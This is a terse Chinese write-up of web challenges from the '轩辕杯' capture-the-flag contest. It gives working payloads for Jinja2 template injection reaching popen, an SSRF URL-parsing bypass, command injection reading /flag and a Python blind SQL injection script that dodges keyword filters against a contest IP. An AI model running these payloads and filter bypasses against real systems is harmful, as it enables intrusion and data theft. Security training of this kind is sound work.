轩辕杯

ezflask

过滤 用中括号代替 构造payload.

?name={{''["__class__"]["__base__"]["__subclasses__"]()[133]["__init__"]["__globals__"][request["args"]["a"]](request["args"]["b"])['read']()}}&a=popen&b=cat /flag

ezJSEZJS

看源码直接发包

if (scoreNow === 100000000000) {        fetch('getflag.php', {method: 'POST',headers: {'Content-Type': 'application/x-www-form-urlencoded',            },body: 'score=' + scoreNow        })        .then(response => response.text())        .then(data => {            alert("恭喜你！flag是：" + data);        })        .catch(error => {console.error('错误:', error);        });    }})

ezssrf

考点在于满足下式

$x['host'] === null && $x['scheme'] === 'http'

paylaod:

?url=http:/127.0.0.1/flag

访问

签到

写一下关键过程

payload

?cmd=nl+%2Fflag%3f

ezRCE

readgzfile

ezSQL

过滤空格+select

内联注释+双写

得到flag后base64解码

exp:

import requestsimport time#http://27.25.151.26:4925/?id=1/**/and/**/(if(ascii(substr((seselectlect/**/group_concat(schema_name)/**/from/**/information_schema.schemata),1,1))>32,1,0))url="http://27.25.151.26:4925/"flag=""# select="select/**/version()"#10.5.28-MariaDB-0+deb11u2select="seselectlect/**/group_concat(schema_name)/**/from/**/information_schema.schemata"#information_schema,performamce_schema,mysql,ctf,xuanyuanCTFselect="seselectlect/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='xuanyuanCTF'"#xuyuanCTF infoselect="seselectlect/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=%27xuanyuanCTF%27/**/and/**/table_name='info'"#xuyuanCTF id,title,contentselect="seselectlect/**/group_concat(id,title,content)/**/from/**/xuanyuanCTF.info"#1F1AG ZmxhZ3vmrILov47mnaXli7DovanovpXmna99#flag{欢迎来到轩辕杯}for i in range(1,100):# if i<=25:#  continue left=32 right=127 mid=(left+right)//2while left<right:  poc1=f"?id=1/**/and/**/(if(ascii(substr(({select}),{i},1))>{mid},1,0))"  payload=poc1  time.sleep(1)  r=requests.get(url+payload)if"admin"in r.text:   left=mid+1else:   right=mid  mid=(left+right)//2 flag+=chr(mid) print(flag)